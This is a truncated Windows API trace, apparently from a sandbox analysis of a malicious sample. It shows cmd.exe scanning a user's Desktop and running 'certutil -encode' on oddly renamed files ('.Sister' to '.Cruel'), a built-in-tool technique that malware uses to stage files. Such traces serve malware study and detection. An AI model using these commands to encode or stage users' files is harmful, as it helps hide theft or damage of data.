[0264.476] GetProcessHeap () returned 0x21ed8c70000 [0264.476] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b60) returned 1 [0264.476] GetProcessHeap () returned 0x21ed8c70000 [0264.476] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95a40 [0264.476] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0264.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.476] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0264.476] _get_osfhandle (_FileHandle=0) returned 0x4c [0264.476] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0264.477] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.csv.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.csv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.csv.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xd24, dwThreadId=0x10f8)) returned 1 [0264.490] CloseHandle (hObject=0xa8) returned 1 [0264.490] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0264.490] GetProcessHeap () returned 0x21ed8c70000 [0264.491] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0264.491] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0264.491] GetProcessHeap () returned 0x21ed8c70000 [0264.491] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60f30 [0264.491] FreeEnvironmentStringsA (penv="=") returned 1 [0264.491] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0265.059] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0265.059] CloseHandle (hObject=0xa4) returned 1 [0265.059] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0265.059] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0265.059] GetProcessHeap () returned 0x21ed8c70000 [0265.059] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0265.059] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0265.060] GetProcessHeap () returned 0x21ed8c70000 [0265.060] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60f30 [0265.060] FreeEnvironmentStringsA (penv="=") returned 1 [0265.060] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0265.060] GetProcessHeap () returned 0x21ed8c70000 [0265.060] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0265.060] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0265.060] GetProcessHeap () returned 0x21ed8c70000 [0265.060] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60f30 [0265.060] FreeEnvironmentStringsA (penv="=") returned 1 [0265.060] GetProcessHeap () returned 0x21ed8c70000 [0265.060] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95a40) returned 1 [0265.060] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0265.060] ??_V@YAXPEAX@Z () returned 0x1 [0265.060] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d91df0, ftCreationTime.dwHighDateTime=0x1d5e301, ftLastAccessTime.dwLowDateTime=0xf20b5d00, ftLastAccessTime.dwHighDateTime=0x1d5e4a7, ftLastWriteTime.dwLowDateTime=0xf20b5d00, ftLastWriteTime.dwHighDateTime=0x1d5e4a7, nFileSizeHigh=0x0, nFileSizeLow=0xd0e4, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Yc0pm06NSLlWRhlBhv0.wav.Sister", cAlternateFileName="")) returned 1 [0265.061] GetProcessHeap () returned 0x21ed8c70000 [0265.061] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44660, Size=0x61a) returned 0x21ed8d44660 [0265.061] GetProcessHeap () returned 0x21ed8c70000 [0265.061] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44660) returned 0x61a [0265.061] GetProcessHeap () returned 0x21ed8c70000 [0265.061] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29920 [0265.061] GetProcessHeap () returned 0x21ed8c70000 [0265.061] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29920, Size=0x58) returned 0x21ed8d29920 [0265.061] GetProcessHeap () returned 0x21ed8c70000 [0265.061] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29920) returned 0x58 [0265.061] GetProcessHeap () returned 0x21ed8c70000 [0265.061] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29990 [0265.061] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0265.061] GetProcessHeap () returned 0x21ed8c70000 [0265.061] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4e) returned 0x21ed8c7ca60 [0265.061] ??_V@YAXPEAX@Z () returned 0x1 [0265.061] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0265.061] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0265.062] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0265.062] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cc40 [0265.062] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0265.062] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc87faca1, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc87faca1, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb80 [0265.062] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0265.062] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Yc0pm06NSLlWRhlBhv0.wav.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d91df0, ftCreationTime.dwHighDateTime=0x1d5e301, ftLastAccessTime.dwLowDateTime=0xf20b5d00, ftLastAccessTime.dwHighDateTime=0x1d5e4a7, ftLastWriteTime.dwLowDateTime=0xf20b5d00, ftLastWriteTime.dwHighDateTime=0x1d5e4a7, nFileSizeHigh=0x0, nFileSizeLow=0xd0e4, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Yc0pm06NSLlWRhlBhv0.wav.Sister", cAlternateFileName="YC0PM0~1.SIS")) returned 0x21ed8c7cb80 [0265.062] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0265.063] _wcsnicmp (_String1="YC0PM0~1.SIS", _String2="Yc0pm06NSLlWRhlBhv0.wav.Sister", _MaxCount=0x1e) returned 72 [0265.063] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0265.063] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0265.063] GetProcessHeap () returned 0x21ed8c70000 [0265.063] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8cc79c0 [0265.063] ??_V@YAXPEAX@Z () returned 0x1 [0265.063] ??_V@YAXPEAX@Z () returned 0x1 [0265.063] GetProcessHeap () returned 0x21ed8c70000 [0265.063] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29990, Size=0x260) returned 0x21ed8d29990 [0265.063] GetProcessHeap () returned 0x21ed8c70000 [0265.063] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29990) returned 0x260 [0265.063] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0265.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.063] GetFileType (hFile=0x50) returned 0x2 [0265.064] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0265.064] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0265.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.164] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0265.240] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0265.240] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0265.240] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0265.240] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0265.240] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.240] GetFileType (hFile=0x50) returned 0x2 [0265.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0265.241] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0265.309] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.309] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0265.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.411] GetFileType (hFile=0x50) returned 0x2 [0265.412] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0265.412] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0265.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.479] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d29930*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d29930*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0265.555] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.wav.Cruel\" ") returned 74 [0265.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.555] GetFileType (hFile=0x50) returned 0x2 [0265.555] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0265.555] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0265.720] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.720] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4a, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4a) returned 1 [0265.798] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0265.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.798] GetFileType (hFile=0x50) returned 0x2 [0265.798] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0265.798] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0265.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0265.868] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0265.947] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0266.073] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0266.073] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0266.073] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0266.073] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0266.073] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0266.073] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0266.073] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0266.073] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0266.073] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0266.073] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0266.073] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0266.073] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0266.073] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0266.073] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0266.073] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0266.074] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0266.074] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0266.074] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0266.074] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0266.074] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0266.074] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0266.074] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0266.074] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0266.074] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0266.074] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0266.074] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0266.074] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0266.074] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0266.074] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0266.074] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0266.074] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0266.074] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0266.074] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0266.074] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0266.074] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0266.074] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0266.074] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0266.074] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0266.074] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0266.074] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0266.074] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0266.075] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0266.075] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0266.075] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0266.075] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0266.075] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0266.075] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0266.075] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0266.075] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0266.075] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0266.075] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0266.075] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0266.075] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0266.075] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0266.075] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0266.075] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0266.075] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0266.075] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0266.075] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0266.075] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0266.075] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0266.075] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0266.075] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0266.075] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0266.075] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0266.076] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0266.076] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0266.076] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0266.076] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0266.076] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0266.076] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0266.076] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0266.076] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0266.076] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0266.076] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0266.076] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0266.076] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0266.076] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0266.076] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0266.076] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0266.076] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0266.076] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0266.076] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0266.076] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0266.076] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0266.076] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0266.076] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0266.076] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0266.076] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0266.076] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0266.076] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0266.077] ??_V@YAXPEAX@Z () returned 0x1 [0266.077] GetProcessHeap () returned 0x21ed8c70000 [0266.077] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93e0e80 [0266.077] GetProcessHeap () returned 0x21ed8c70000 [0266.077] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb6) returned 0x21ed8c96580 [0266.077] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0266.077] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0266.077] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0266.077] GetProcessHeap () returned 0x21ed8c70000 [0266.077] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93f0e70 [0266.079] SetErrorMode (uMode=0x0) returned 0x0 [0266.079] SetErrorMode (uMode=0x1) returned 0x0 [0266.079] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93f0e80, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0266.079] SetErrorMode (uMode=0x0) returned 0x1 [0266.079] GetProcessHeap () returned 0x21ed8c70000 [0266.079] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93f0e70, Size=0x52) returned 0x21ed93f0e70 [0266.079] GetProcessHeap () returned 0x21ed8c70000 [0266.079] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93f0e70) returned 0x52 [0266.079] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0266.079] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0266.079] GetProcessHeap () returned 0x21ed8c70000 [0266.079] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937cea0 [0266.079] GetProcessHeap () returned 0x21ed8c70000 [0266.079] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d44c90 [0266.079] GetProcessHeap () returned 0x21ed8c70000 [0266.080] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44c90, Size=0x1be) returned 0x21ed8d44c90 [0266.080] GetProcessHeap () returned 0x21ed8c70000 [0266.080] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44c90) returned 0x1be [0266.080] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.080] GetProcessHeap () returned 0x21ed8c70000 [0266.080] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed93b0aa0 [0266.080] GetProcessHeap () returned 0x21ed8c70000 [0266.080] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0aa0, Size=0x7e) returned 0x21ed93b0aa0 [0266.080] GetProcessHeap () returned 0x21ed8c70000 [0266.080] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0aa0) returned 0x7e [0266.080] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.080] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0266.081] GetLastError () returned 0x2 [0266.081] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.081] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0266.081] GetLastError () returned 0x2 [0266.081] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.081] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ce20 [0266.081] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0266.082] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0266.082] GetLastError () returned 0x2 [0266.082] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0266.082] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0266.082] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0266.082] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0266.082] ??_V@YAXPEAX@Z () returned 0x1 [0266.082] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0266.164] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0266.164] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0266.164] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: 